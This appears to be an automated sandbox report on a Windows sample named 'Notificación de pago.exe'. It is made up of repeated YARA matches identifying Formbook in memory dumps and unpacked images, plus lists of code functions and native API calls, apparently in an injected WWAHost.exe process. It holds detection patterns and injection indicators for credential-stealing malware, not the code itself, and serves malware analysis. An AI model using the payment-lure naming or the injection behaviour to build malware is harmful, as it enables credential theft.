          Source: Yara match | File source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.Notificaci#U00f3n de pago.exe.4141a78.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.Notificaci#U00f3n de pago.exe.3ffb388.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Notificaci#U00f3n de pago.exe.4141a78.5.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Notificaci#U00f3n de pago.exe.4141a78.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Notificaci#U00f3n de pago.exe.3ffb388.6.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Notificaci#U00f3n de pago.exe.3ffb388.6.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Notificaci#U00f3n de pago.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Notificaci#U00f3n de pago.exe.4141a78.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Notificaci#U00f3n de pago.exe.4141a78.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Notificaci#U00f3n de pago.exe.3ffb388.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Notificaci#U00f3n de pago.exe.3ffb388.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 0_2_02F1C754
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 0_2_02F1EB98
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 0_2_02F1EB88
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 0_2_076A2113
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 0_2_076A4F58
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 0_2_076A5CA8
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 0_2_076A9AE0
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_00401030
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041E1AE
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0040926C
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_00409270
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041DBB2
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0040DC10
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_00402D88
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_00402D90
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041DEF4
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_00402FB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398EBB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1DBD2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A22B28
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A222AE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395F900
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03974120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396B090
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A220A8
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039820A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A228EC
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A2E824
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11002
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A21FF1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A22EF7
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03976E30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1D616
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396D5E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A225DD
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A22D07
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03950D20
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A21D55
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396841F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1D466
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A6926C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A69270
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7DBB2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A6DC10
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A62D88
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A62D90
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7DEF3
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A62FB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 0395B150 appears 35 times
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A310 NtCreateFile,
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A3C0 NtReadFile,
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A440 NtClose,
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A4F0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A362 NtCreateFile,
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A30A NtCreateFile,
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A3BA NtReadFile,
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A43B NtClose,
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A4EA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A4F4 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039999A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999780 NtMapViewOfSection,LdrInitializeThunk,
